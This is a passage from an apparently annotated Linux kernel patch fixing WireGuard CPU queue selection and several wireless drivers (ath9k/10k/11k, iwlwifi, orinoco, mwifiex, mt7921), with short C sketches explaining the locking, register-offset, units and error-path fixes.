++		cpu = cpumask_first(cpu_online_mask);
++	*last_cpu = cpu;
+ 	return cpu;
+ }
+ 
+@@ -159,7 +156,7 @@ static inline void wg_prev_queue_drop_peeked(struct prev_queue *queue)
+ 
+ static inline int wg_queue_enqueue_per_device_and_peer(
+ 	struct crypt_queue *device_queue, struct prev_queue *peer_queue,
+-	struct sk_buff *skb, struct workqueue_struct *wq, int *next_cpu)
++	struct sk_buff *skb, struct workqueue_struct *wq)
+ {
+ 	int cpu;
+ 
+@@ -173,7 +170,7 @@ static inline int wg_queue_enqueue_per_device_and_peer(
+ 	/* Then we queue it up in the device queue, which consumes the
+ 	 * packet as soon as it can.
+ 	 */
+-	cpu = wg_cpumask_next_online(next_cpu);
++	cpu = wg_cpumask_next_online(&device_queue->last_cpu);
+ 	if (unlikely(ptr_ring_produce_bh(&device_queue->ring, skb)))
+ 		return -EPIPE;
+ 	queue_work_on(cpu, wq, &per_cpu_ptr(device_queue->worker, cpu)->work);
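
The rewritten wg_cpumask_next_online() walks forward from the queue's own last_cpu and wraps to the first online CPU, trading the old modulo trick for an obvious scan; the race on last_cpu is tolerated, as the comment says. Equivalent logic over a boolean array standing in for cpu_online_mask, assuming at least one CPU is online (as the kernel does):

#include <stdbool.h>
#include <stdio.h>

#define NR_CPUS 4
static bool online[NR_CPUS] = { true, false, true, true };

static int next_online(int *last_cpu)
{
	int cpu = *last_cpu;

	do {
		cpu = (cpu + 1) % NR_CPUS; /* wrap like cpumask_first() */
	} while (!online[cpu]);
	*last_cpu = cpu;
	return cpu;
}

int main(void)
{
	int last = -1; /* matches queue->last_cpu = -1 in queueing.c */

	for (int i = 0; i < 5; i++)
		printf("%d ", next_online(&last)); /* 0 2 3 0 2 */
	printf("\n");
	return 0;
}
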
+diff --git a/drivers/net/wireguard/receive.c b/drivers/net/wireguard/receive.c
+index 7135d51d2d872..0b3f0c8435509 100644
+--- a/drivers/net/wireguard/receive.c
++++ b/drivers/net/wireguard/receive.c
+@@ -524,7 +524,7 @@ static void wg_packet_consume_data(struct wg_device *wg, struct sk_buff *skb)
+ 		goto err;
+ 
+ 	ret = wg_queue_enqueue_per_device_and_peer(&wg->decrypt_queue, &peer->rx_queue, skb,
+-						   wg->packet_crypt_wq, &wg->decrypt_queue.last_cpu);
++						   wg->packet_crypt_wq);
+ 	if (unlikely(ret == -EPIPE))
+ 		wg_queue_enqueue_per_peer_rx(skb, PACKET_STATE_DEAD);
+ 	if (likely(!ret || ret == -EPIPE)) {
+diff --git a/drivers/net/wireguard/send.c b/drivers/net/wireguard/send.c
+index 5368f7c35b4bf..95c853b59e1da 100644
+--- a/drivers/net/wireguard/send.c
++++ b/drivers/net/wireguard/send.c
+@@ -318,7 +318,7 @@ static void wg_packet_create_data(struct wg_peer *peer, struct sk_buff *first)
+ 		goto err;
+ 
+ 	ret = wg_queue_enqueue_per_device_and_peer(&wg->encrypt_queue, &peer->tx_queue, first,
+-						   wg->packet_crypt_wq, &wg->encrypt_queue.last_cpu);
++						   wg->packet_crypt_wq);
+ 	if (unlikely(ret == -EPIPE))
+ 		wg_queue_enqueue_per_peer_tx(first, PACKET_STATE_DEAD);
+ err:
+diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c
+index 5eb131ab916fd..6cdb225b7eacc 100644
+--- a/drivers/net/wireless/ath/ath10k/core.c
++++ b/drivers/net/wireless/ath/ath10k/core.c
+@@ -2504,7 +2504,6 @@ EXPORT_SYMBOL(ath10k_core_napi_sync_disable);
+ static void ath10k_core_restart(struct work_struct *work)
+ {
+ 	struct ath10k *ar = container_of(work, struct ath10k, restart_work);
+-	struct ath10k_vif *arvif;
+ 	int ret;
+ 
+ 	set_bit(ATH10K_FLAG_CRASH_FLUSH, &ar->dev_flags);
+@@ -2543,14 +2542,6 @@ static void ath10k_core_restart(struct work_struct *work)
+ 		ar->state = ATH10K_STATE_RESTARTING;
+ 		ath10k_halt(ar);
+ 		ath10k_scan_finish(ar);
+-		if (ar->hw_params.hw_restart_disconnect) {
+-			list_for_each_entry(arvif, &ar->arvifs, list) {
+-				if (arvif->is_up &&
+-				    arvif->vdev_type == WMI_VDEV_TYPE_STA)
+-					ieee80211_hw_restart_disconnect(arvif->vif);
+-			}
+-		}
+-
+ 		ieee80211_restart_hw(ar->hw);
+ 		break;
+ 	case ATH10K_STATE_OFF:
+@@ -3643,6 +3634,9 @@ struct ath10k *ath10k_core_create(size_t priv_size, struct device *dev,
+ 	mutex_init(&ar->dump_mutex);
+ 	spin_lock_init(&ar->data_lock);
+ 
++	for (int ac = 0; ac < IEEE80211_NUM_ACS; ac++)
++		spin_lock_init(&ar->queue_lock[ac]);
++
+ 	INIT_LIST_HEAD(&ar->peers);
+ 	init_waitqueue_head(&ar->peer_mapping_wq);
+ 	init_waitqueue_head(&ar->htt.empty_tx_wq);
+diff --git a/drivers/net/wireless/ath/ath10k/core.h b/drivers/net/wireless/ath/ath10k/core.h
+index f5de8ce8fb456..4b5239de40184 100644
+--- a/drivers/net/wireless/ath/ath10k/core.h
++++ b/drivers/net/wireless/ath/ath10k/core.h
+@@ -1170,6 +1170,9 @@ struct ath10k {
+ 	/* protects shared structure data */
+ 	spinlock_t data_lock;
+ 
++	/* serialize wake_tx_queue calls per ac */
++	spinlock_t queue_lock[IEEE80211_NUM_ACS];
++
+ 	struct list_head arvifs;
+ 	struct list_head peers;
+ 	struct ath10k_peer *peer_map[ATH10K_MAX_NUM_PEER_IDS];
+diff --git a/drivers/net/wireless/ath/ath10k/mac.c b/drivers/net/wireless/ath/ath10k/mac.c
+index ec8d5b29bc72c..ec5c54672dfee 100644
+--- a/drivers/net/wireless/ath/ath10k/mac.c
++++ b/drivers/net/wireless/ath/ath10k/mac.c
+@@ -4732,13 +4732,14 @@ static void ath10k_mac_op_wake_tx_queue(struct ieee80211_hw *hw,
+ {
+ 	struct ath10k *ar = hw->priv;
+ 	int ret;
+-	u8 ac;
++	u8 ac = txq->ac;
+ 
+ 	ath10k_htt_tx_txq_update(hw, txq);
+ 	if (ar->htt.tx_q_state.mode != HTT_TX_MODE_SWITCH_PUSH)
+ 		return;
+ 
+-	ac = txq->ac;
++	spin_lock_bh(&ar->queue_lock[ac]);
++
+ 	ieee80211_txq_schedule_start(hw, ac);
+ 	txq = ieee80211_next_txq(hw, ac);
+ 	if (!txq)
+@@ -4753,6 +4754,7 @@ static void ath10k_mac_op_wake_tx_queue(struct ieee80211_hw *hw,
+ 	ath10k_htt_tx_txq_update(hw, txq);
+ out:
+ 	ieee80211_txq_schedule_end(hw, ac);
++	spin_unlock_bh(&ar->queue_lock[ac]);
+ }
+ 
+ /* Must not be called with conf_mutex held as workers can use that also. */
+@@ -8108,6 +8110,7 @@ static void ath10k_reconfig_complete(struct ieee80211_hw *hw,
+ 				     enum ieee80211_reconfig_type reconfig_type)
+ {
+ 	struct ath10k *ar = hw->priv;
++	struct ath10k_vif *arvif;
+ 
+ 	if (reconfig_type != IEEE80211_RECONFIG_TYPE_RESTART)
+ 		return;
+@@ -8122,6 +8125,12 @@ static void ath10k_reconfig_complete(struct ieee80211_hw *hw,
+ 		ar->state = ATH10K_STATE_ON;
+ 		ieee80211_wake_queues(ar->hw);
+ 		clear_bit(ATH10K_FLAG_RESTARTING, &ar->dev_flags);
++		if (ar->hw_params.hw_restart_disconnect) {
++			list_for_each_entry(arvif, &ar->arvifs, list) {
++				if (arvif->is_up && arvif->vdev_type == WMI_VDEV_TYPE_STA)
++					ieee80211_hw_restart_disconnect(arvif->vif);
++			}
++		}
+ 	}
+ 
+ 	mutex_unlock(&ar->conf_mutex);
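
The mac.c hunk above serializes wake_tx_queue processing per access category: the lock is held around the whole schedule_start/next_txq/schedule_end walk, so two callers for the same AC can no longer interleave, while different ACs still proceed in parallel. A hedged pthread sketch of the same lock-per-class layout (the class count mirrors IEEE80211_NUM_ACS; everything else is invented for illustration):

    #include <pthread.h>
    #include <stdio.h>

    #define NUM_ACS 4       /* mirrors IEEE80211_NUM_ACS */

    static pthread_spinlock_t queue_lock[NUM_ACS];

    static void wake_queue(int ac)
    {
            pthread_spin_lock(&queue_lock[ac]);
            /* The schedule_start / next_txq / push-work sequence would
             * sit here: it runs single-file per AC, but ACs do not
             * contend with each other. */
            printf("serviced ac %d\n", ac);
            pthread_spin_unlock(&queue_lock[ac]);
    }

    int main(void)
    {
            for (int ac = 0; ac < NUM_ACS; ac++)
                    pthread_spin_init(&queue_lock[ac], PTHREAD_PROCESS_PRIVATE);

            wake_queue(2);

            for (int ac = 0; ac < NUM_ACS; ac++)
                    pthread_spin_destroy(&queue_lock[ac]);
            return 0;
    }
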
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 381c6b390dd78..01b02c03fa89c 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -2058,6 +2058,9 @@ static int ath11k_qmi_assign_target_mem_chunk(struct ath11k_base *ab)
+ 			ab->qmi.target_mem[idx].iaddr =
+ 				ioremap(ab->qmi.target_mem[idx].paddr,
+ 					ab->qmi.target_mem[i].size);
++			if (!ab->qmi.target_mem[idx].iaddr)
++				return -EIO;
++
+ 			ab->qmi.target_mem[idx].size = ab->qmi.target_mem[i].size;
+ 			host_ddr_sz = ab->qmi.target_mem[i].size;
+ 			ab->qmi.target_mem[idx].type = ab->qmi.target_mem[i].type;
+@@ -2083,6 +2086,8 @@ static int ath11k_qmi_assign_target_mem_chunk(struct ath11k_base *ab)
+ 					ab->qmi.target_mem[idx].iaddr =
+ 						ioremap(ab->qmi.target_mem[idx].paddr,
+ 							ab->qmi.target_mem[i].size);
++					if (!ab->qmi.target_mem[idx].iaddr)
++						return -EIO;
+ 				} else {
+ 					ab->qmi.target_mem[idx].paddr =
+ 						ATH11K_QMI_CALDB_ADDRESS;
+diff --git a/drivers/net/wireless/ath/ath9k/ar9003_hw.c b/drivers/net/wireless/ath/ath9k/ar9003_hw.c
+index 42f00a2a8c800..cf5648188459c 100644
+--- a/drivers/net/wireless/ath/ath9k/ar9003_hw.c
++++ b/drivers/net/wireless/ath/ath9k/ar9003_hw.c
+@@ -1099,17 +1099,22 @@ static bool ath9k_hw_verify_hang(struct ath_hw *ah, unsigned int queue)
+ {
+ 	u32 dma_dbg_chain, dma_dbg_complete;
+ 	u8 dcu_chain_state, dcu_complete_state;
++	unsigned int dbg_reg, reg_offset;
+ 	int i;
+ 
+-	for (i = 0; i < NUM_STATUS_READS; i++) {
+-		if (queue < 6)
+-			dma_dbg_chain = REG_READ(ah, AR_DMADBG_4);
+-		else
+-			dma_dbg_chain = REG_READ(ah, AR_DMADBG_5);
++	if (queue < 6) {
++		dbg_reg = AR_DMADBG_4;
++		reg_offset = queue * 5;
++	} else {
++		dbg_reg = AR_DMADBG_5;
++		reg_offset = (queue - 6) * 5;
++	}
+ 
++	for (i = 0; i < NUM_STATUS_READS; i++) {
++		dma_dbg_chain = REG_READ(ah, dbg_reg);
+ 		dma_dbg_complete = REG_READ(ah, AR_DMADBG_6);
+ 
+-		dcu_chain_state = (dma_dbg_chain >> (5 * queue)) & 0x1f;
++		dcu_chain_state = (dma_dbg_chain >> reg_offset) & 0x1f;
+ 		dcu_complete_state = dma_dbg_complete & 0x3;
+ 
+ 		if ((dcu_chain_state != 0x6) || (dcu_complete_state != 0x1))
+@@ -1128,6 +1133,7 @@ static bool ar9003_hw_detect_mac_hang(struct ath_hw *ah)
+ 	u8 dcu_chain_state, dcu_complete_state;
+ 	bool dcu_wait_frdone = false;
+ 	unsigned long chk_dcu = 0;
++	unsigned int reg_offset;
+ 	unsigned int i = 0;
+ 
+ 	dma_dbg_4 = REG_READ(ah, AR_DMADBG_4);
+@@ -1139,12 +1145,15 @@ static bool ar9003_hw_detect_mac_hang(struct ath_hw *ah)
+ 		goto exit;
+ 
+ 	for (i = 0; i < ATH9K_NUM_TX_QUEUES; i++) {
+-		if (i < 6)
++		if (i < 6) {
+ 			chk_dbg = dma_dbg_4;
+-		else
++			reg_offset = i * 5;
++		} else {
+ 			chk_dbg = dma_dbg_5;
++			reg_offset = (i - 6) * 5;
++		}
+ 
+-		dcu_chain_state = (chk_dbg >> (5 * i)) & 0x1f;
++		dcu_chain_state = (chk_dbg >> reg_offset) & 0x1f;
+ 		if (dcu_chain_state == 0x6) {
+ 			dcu_wait_frdone = true;
+ 			chk_dcu |= BIT(i);
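
Both ar9003_hw.c hunks fix the same latent bug: DCU chain state is packed five bits per queue, with queues 0-5 in AR_DMADBG_4 and queues 6-9 in AR_DMADBG_5, so the shift has to restart at zero for the second register instead of continuing with queue * 5, which already runs out of the 32-bit word at queue 6. A standalone sketch of the corrected mapping, with fabricated register values:

    #include <stdint.h>
    #include <stdio.h>

    /* Each queue gets a 5-bit chain-state field; queues 0-5 sit in the
     * first debug word, queues 6+ restart at bit 0 of the second word. */
    static unsigned int dcu_chain_state(uint32_t dbg4, uint32_t dbg5,
                                        unsigned int queue)
    {
            uint32_t word;
            unsigned int shift;

            if (queue < 6) {
                    word = dbg4;
                    shift = queue * 5;
            } else {
                    word = dbg5;
                    shift = (queue - 6) * 5;
            }
            return (word >> shift) & 0x1f;
    }

    int main(void)
    {
            uint32_t dbg4 = 0, dbg5 = 0;

            dbg4 |= 0x6u << (3 * 5);        /* queue 3 "waiting for frdone" */
            dbg5 |= 0x6u << (1 * 5);        /* queue 7 likewise */

            printf("q3=%#x q7=%#x\n",
                   dcu_chain_state(dbg4, dbg5, 3),
                   dcu_chain_state(dbg4, dbg5, 7));  /* q3=0x6 q7=0x6 */
            return 0;
    }
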
+diff --git a/drivers/net/wireless/ath/ath9k/htc_hst.c b/drivers/net/wireless/ath/ath9k/htc_hst.c
+index fe62ff668f757..99667aba289df 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_hst.c
++++ b/drivers/net/wireless/ath/ath9k/htc_hst.c
+@@ -114,7 +114,13 @@ static void htc_process_conn_rsp(struct htc_target *target,
+ 
+ 	if (svc_rspmsg->status == HTC_SERVICE_SUCCESS) {
+ 		epid = svc_rspmsg->endpoint_id;
+-		if (epid < 0 || epid >= ENDPOINT_MAX)
++
++		/* Check that the received epid for the endpoint to attach
++		 * a new service is valid. ENDPOINT0 can't be used here as it
++		 * is already reserved for HTC_CTRL_RSVD_SVC service and thus
++		 * should not be modified.
++		 */
++		if (epid <= ENDPOINT0 || epid >= ENDPOINT_MAX)
+ 			return;
+ 
+ 		service_id = be16_to_cpu(svc_rspmsg->service_id);
+diff --git a/drivers/net/wireless/ath/ath9k/main.c b/drivers/net/wireless/ath/ath9k/main.c
+index a4197c14f0a92..6360d3356e256 100644
+--- a/drivers/net/wireless/ath/ath9k/main.c
++++ b/drivers/net/wireless/ath/ath9k/main.c
+@@ -203,7 +203,7 @@ void ath_cancel_work(struct ath_softc *sc)
+ void ath_restart_work(struct ath_softc *sc)
+ {
+ 	ieee80211_queue_delayed_work(sc->hw, &sc->hw_check_work,
+-				     ATH_HW_CHECK_POLL_INT);
++				     msecs_to_jiffies(ATH_HW_CHECK_POLL_INT));
+ 
+ 	if (AR_SREV_9340(sc->sc_ah) || AR_SREV_9330(sc->sc_ah))
+ 		ieee80211_queue_delayed_work(sc->hw, &sc->hw_pll_work,
+@@ -850,7 +850,7 @@ static bool ath9k_txq_list_has_key(struct list_head *txq_list, u32 keyix)
+ static bool ath9k_txq_has_key(struct ath_softc *sc, u32 keyix)
+ {
+ 	struct ath_hw *ah = sc->sc_ah;
+-	int i;
++	int i, j;
+ 	struct ath_txq *txq;
+ 	bool key_in_use = false;
+ 
+@@ -868,8 +868,9 @@ static bool ath9k_txq_has_key(struct ath_softc *sc, u32 keyix)
+ 		if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) {
+ 			int idx = txq->txq_tailidx;
+ 
+-			while (!key_in_use &&
+-			       !list_empty(&txq->txq_fifo[idx])) {
++			for (j = 0; !key_in_use &&
++			     !list_empty(&txq->txq_fifo[idx]) &&
++			     j < ATH_TXFIFO_DEPTH; j++) {
+ 				key_in_use = ath9k_txq_list_has_key(
+ 					&txq->txq_fifo[idx], keyix);
+ 				INCR(idx, ATH_TXFIFO_DEPTH);
+@@ -2239,7 +2240,7 @@ void __ath9k_flush(struct ieee80211_hw *hw, u32 queues, bool drop,
+ 	}
+ 
+ 	ieee80211_queue_delayed_work(hw, &sc->hw_check_work,
+-				     ATH_HW_CHECK_POLL_INT);
++				     msecs_to_jiffies(ATH_HW_CHECK_POLL_INT));
+ }
+ 
+ static bool ath9k_tx_frames_pending(struct ieee80211_hw *hw)
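
The two main.c one-liners above are a units fix: ieee80211_queue_delayed_work() expects a delay in jiffies, while ATH_HW_CHECK_POLL_INT is a millisecond count, so without msecs_to_jiffies() the effective poll interval depended on CONFIG_HZ and only happened to be right at HZ=1000. A sketch of the round-up conversion, treating HZ as a plain constant:

    #include <stdio.h>

    #define HZ 250  /* ticks per second; kernel configs vary */

    /* Round milliseconds up to whole ticks, like msecs_to_jiffies(). */
    static unsigned long ms_to_ticks(unsigned long ms)
    {
            return (ms * HZ + 999) / 1000;
    }

    int main(void)
    {
            /* 1000 ms -> 250 ticks; passing the raw 1000 instead would
             * be read as 1000 ticks, i.e. four seconds at HZ=250. */
            printf("%lu\n", ms_to_ticks(1000));
            return 0;
    }
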
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index 19345b8f7bfd5..d652c647d56b5 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -221,6 +221,10 @@ static void ath9k_wmi_ctrl_rx(void *priv, struct sk_buff *skb,
+ 	if (unlikely(wmi->stopped))
+ 		goto free_skb;
+ 
++	/* Validate the obtained SKB. */
++	if (unlikely(skb->len < sizeof(struct wmi_cmd_hdr)))
++		goto free_skb;
++
+ 	hdr = (struct wmi_cmd_hdr *) skb->data;
+ 	cmd_id = be16_to_cpu(hdr->command_id);
+ 
+diff --git a/drivers/net/wireless/atmel/atmel_cs.c b/drivers/net/wireless/atmel/atmel_cs.c
+index 453bb84cb3386..58bba9875d366 100644
+--- a/drivers/net/wireless/atmel/atmel_cs.c
++++ b/drivers/net/wireless/atmel/atmel_cs.c
+@@ -72,6 +72,7 @@ struct local_info {
+ static int atmel_probe(struct pcmcia_device *p_dev)
+ {
+ 	struct local_info *local;
++	int ret;
+ 
+ 	dev_dbg(&p_dev->dev, "atmel_attach()\n");
+ 
+@@ -82,8 +83,16 @@ static int atmel_probe(struct pcmcia_device *p_dev)
+ 
+ 	p_dev->priv = local;
+ 
+-	return atmel_config(p_dev);
+-} /* atmel_attach */
++	ret = atmel_config(p_dev);
++	if (ret)
++		goto err_free_priv;
++
++	return 0;
++
++err_free_priv:
++	kfree(p_dev->priv);
++	return ret;
++}
+ 
+ static void atmel_detach(struct pcmcia_device *link)
+ {
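
This atmel_cs change is the first of several identical fixes in this patch; orinoco_cs, spectrum_cs, ray_cs and wl3501_cs below follow the same shape. Probe used to return the config helper's status directly and leaked the just-allocated private data on failure. A minimal userspace sketch of the corrected unwind, with stand-in alloc/config helpers:

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>

    struct local_info { int dummy; };

    /* Stand-in for atmel_config(); pretend configuration fails. */
    static int fake_config(struct local_info *local)
    {
            (void)local;
            return -EIO;
    }

    static int probe(void)
    {
            struct local_info *local;
            int ret;

            local = calloc(1, sizeof(*local));
            if (!local)
                    return -ENOMEM;

            ret = fake_config(local);
            if (ret)
                    goto err_free_priv;     /* undo the allocation */

            return 0;

    err_free_priv:
            free(local);
            return ret;
    }

    int main(void)
    {
            printf("probe -> %d (no leak on the error path)\n", probe());
            return 0;
    }
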
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 994f597a7102a..864f5fb260409 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1686,8 +1686,11 @@ static void iwl_mvm_queue_state_change(struct iwl_op_mode *op_mode,
+ 		else
+ 			set_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
+ 
+-		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST)
++		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST) {
++			local_bh_disable();
+ 			iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
++			local_bh_enable();
++		}
+ 	}
+ 
+ out:
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 02c2a06301076..f268a31ce26d9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -296,7 +296,8 @@ static void iwl_mvm_get_signal_strength(struct iwl_mvm *mvm,
+ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 				struct ieee80211_hdr *hdr,
+ 				struct iwl_rx_mpdu_desc *desc,
+-				u32 status)
++				u32 status,
++				struct ieee80211_rx_status *stats)
+ {
+ 	struct iwl_mvm_sta *mvmsta;
+ 	struct iwl_mvm_vif *mvmvif;
+@@ -325,8 +326,10 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 
+ 	/* good cases */
+ 	if (likely(status & IWL_RX_MPDU_STATUS_MIC_OK &&
+-		   !(status & IWL_RX_MPDU_STATUS_REPLAY_ERROR)))
++		   !(status & IWL_RX_MPDU_STATUS_REPLAY_ERROR))) {
++		stats->flag |= RX_FLAG_DECRYPTED;
+ 		return 0;
++	}
+ 
+ 	if (!sta)
+ 		return -1;
+@@ -395,7 +398,7 @@ static int iwl_mvm_rx_crypto(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 
+ 	if (unlikely(ieee80211_is_mgmt(hdr->frame_control) &&
+ 		     !ieee80211_has_protected(hdr->frame_control)))
+-		return iwl_mvm_rx_mgmt_prot(sta, hdr, desc, status);
++		return iwl_mvm_rx_mgmt_prot(sta, hdr, desc, status, stats);
+ 
+ 	if (!ieee80211_has_protected(hdr->frame_control) ||
+ 	    (status & IWL_RX_MPDU_STATUS_SEC_MASK) ==
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index 9c9f87fe83777..b455e981faa1f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1620,14 +1620,14 @@ irqreturn_t iwl_pcie_irq_rx_msix_handler(int irq, void *dev_id)
+ 	struct msix_entry *entry = dev_id;
+ 	struct iwl_trans_pcie *trans_pcie = iwl_pcie_get_trans_pcie(entry);
+ 	struct iwl_trans *trans = trans_pcie->trans;
+-	struct iwl_rxq *rxq = &trans_pcie->rxq[entry->entry];
++	struct iwl_rxq *rxq;
+ 
+ 	trace_iwlwifi_dev_irq_msix(trans->dev, entry, false, 0, 0);
+ 
+ 	if (WARN_ON(entry->entry >= trans->num_rx_queues))
+ 		return IRQ_NONE;
+ 
+-	if (!rxq) {
++	if (!trans_pcie->rxq) {
+ 		if (net_ratelimit())
+ 			IWL_ERR(trans,
+ 				"[%d] Got MSI-X interrupt before we have Rx queues\n",
+@@ -1635,6 +1635,7 @@ irqreturn_t iwl_pcie_irq_rx_msix_handler(int irq, void *dev_id)
+ 		return IRQ_NONE;
+ 	}
+ 
++	rxq = &trans_pcie->rxq[entry->entry];
+ 	lock_map_acquire(&trans->sync_cmd_lockdep_map);
+ 	IWL_DEBUG_ISR(trans, "[%d] Got interrupt\n", entry->entry);
+ 
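
The MSI-X handler fix above is about ordering: rxq was derived from entry->entry before the bounds WARN_ON and before trans_pcie->rxq was known to be non-NULL, so the "do we have Rx queues yet" test examined the wrong pointer. A compact sketch of the corrected order: check the index and the base first, form the element pointer last.

    #include <stddef.h>
    #include <stdio.h>

    struct rxq { int id; };

    static struct rxq *lookup(struct rxq *table, size_t n, size_t idx)
    {
            /* Bounds first, base pointer second, element pointer last;
             * never form table[idx] before both checks have passed. */
            if (idx >= n)
                    return NULL;
            if (!table)
                    return NULL;
            return &table[idx];
    }

    int main(void)
    {
            struct rxq queues[4] = { {0}, {1}, {2}, {3} };

            printf("%p\n", (void *)lookup(NULL, 4, 2)); /* NULL: no table */
            printf("%d\n", lookup(queues, 4, 2)->id);   /* 2 */
            return 0;
    }
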
+diff --git a/drivers/net/wireless/intersil/orinoco/orinoco_cs.c b/drivers/net/wireless/intersil/orinoco/orinoco_cs.c
+index a956f965a1e5e..03bfd2482656c 100644
+--- a/drivers/net/wireless/intersil/orinoco/orinoco_cs.c
++++ b/drivers/net/wireless/intersil/orinoco/orinoco_cs.c
+@@ -96,6 +96,7 @@ orinoco_cs_probe(struct pcmcia_device *link)
+ {
+ 	struct orinoco_private *priv;
+ 	struct orinoco_pccard *card;
++	int ret;
+ 
+ 	priv = alloc_orinocodev(sizeof(*card), &link->dev,
+ 				orinoco_cs_hard_reset, NULL);
+@@ -107,8 +108,16 @@ orinoco_cs_probe(struct pcmcia_device *link)
+ 	card->p_dev = link;
+ 	link->priv = priv;
+ 
+-	return orinoco_cs_config(link);
+-}				/* orinoco_cs_attach */
++	ret = orinoco_cs_config(link);
++	if (ret)
++		goto err_free_orinocodev;
++
++	return 0;
++
++err_free_orinocodev:
++	free_orinocodev(priv);
++	return ret;
++}
+ 
+ static void orinoco_cs_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/intersil/orinoco/spectrum_cs.c b/drivers/net/wireless/intersil/orinoco/spectrum_cs.c
+index 291ef97ed45ec..841d623c621ac 100644
+--- a/drivers/net/wireless/intersil/orinoco/spectrum_cs.c
++++ b/drivers/net/wireless/intersil/orinoco/spectrum_cs.c
+@@ -157,6 +157,7 @@ spectrum_cs_probe(struct pcmcia_device *link)
+ {
+ 	struct orinoco_private *priv;
+ 	struct orinoco_pccard *card;
++	int ret;
+ 
+ 	priv = alloc_orinocodev(sizeof(*card), &link->dev,
+ 				spectrum_cs_hard_reset,
+@@ -169,8 +170,16 @@ spectrum_cs_probe(struct pcmcia_device *link)
+ 	card->p_dev = link;
+ 	link->priv = priv;
+ 
+-	return spectrum_cs_config(link);
+-}				/* spectrum_cs_attach */
++	ret = spectrum_cs_config(link);
++	if (ret)
++		goto err_free_orinocodev;
++
++	return 0;
++
++err_free_orinocodev:
++	free_orinocodev(priv);
++	return ret;
++}
+ 
+ static void spectrum_cs_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/marvell/mwifiex/scan.c b/drivers/net/wireless/marvell/mwifiex/scan.c
+index ac8001c842935..644b1e134b01c 100644
+--- a/drivers/net/wireless/marvell/mwifiex/scan.c
++++ b/drivers/net/wireless/marvell/mwifiex/scan.c
+@@ -2187,9 +2187,9 @@ int mwifiex_ret_802_11_scan(struct mwifiex_private *priv,
+ 
+ 	if (nd_config) {
+ 		adapter->nd_info =
+-			kzalloc(sizeof(struct cfg80211_wowlan_nd_match) +
+-				sizeof(struct cfg80211_wowlan_nd_match *) *
+-				scan_rsp->number_of_sets, GFP_ATOMIC);
++			kzalloc(struct_size(adapter->nd_info, matches,
++					    scan_rsp->number_of_sets),
++				GFP_ATOMIC);
+ 
+ 		if (adapter->nd_info)
+ 			adapter->nd_info->n_matches = scan_rsp->number_of_sets;
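
The mwifiex hunk swaps an open-coded allocation size, which even sized the header with the wrong struct, for struct_size(): header plus n flexible-array elements, saturating on overflow rather than wrapping. A rough userspace approximation follows; the kernel macro additionally type-checks the named flexible member, which this sketch does not:

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    struct match { uint32_t id; };

    struct nd_info {
            uint32_t n_matches;
            struct match matches[];     /* flexible array member */
    };

    /* Rough analogue of struct_size(): header + n elements, clamped to
     * SIZE_MAX on overflow so the allocation below fails cleanly. */
    static size_t nd_info_size(size_t n)
    {
            if (n > (SIZE_MAX - sizeof(struct nd_info)) / sizeof(struct match))
                    return SIZE_MAX;
            return sizeof(struct nd_info) + n * sizeof(struct match);
    }

    int main(void)
    {
            size_t n = 8;
            struct nd_info *info = malloc(nd_info_size(n));

            if (!info)
                    return 1;
            info->n_matches = n;
            printf("allocated %zu bytes for %zu matches\n",
                   nd_info_size(n), n);
            free(info);
            return 0;
    }
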
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+index fd57c87a29ae3..7a305a4f292b4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+@@ -231,10 +231,6 @@ int mt7921_dma_init(struct mt7921_dev *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = mt7921_wfsys_reset(dev);
+-	if (ret)
+-		return ret;
+-
+ 	/* init tx queue */
+ 	ret = mt76_connac_init_tx_queues(dev->phy.mt76, MT7921_TXQ_BAND0,
+ 					 MT7921_TX_RING_SIZE,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index d3507e86e9cf5..10dda1693d7db 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -449,12 +449,6 @@ static int mt7921_load_firmware(struct mt7921_dev *dev)
+ {
+ 	int ret;
+ 
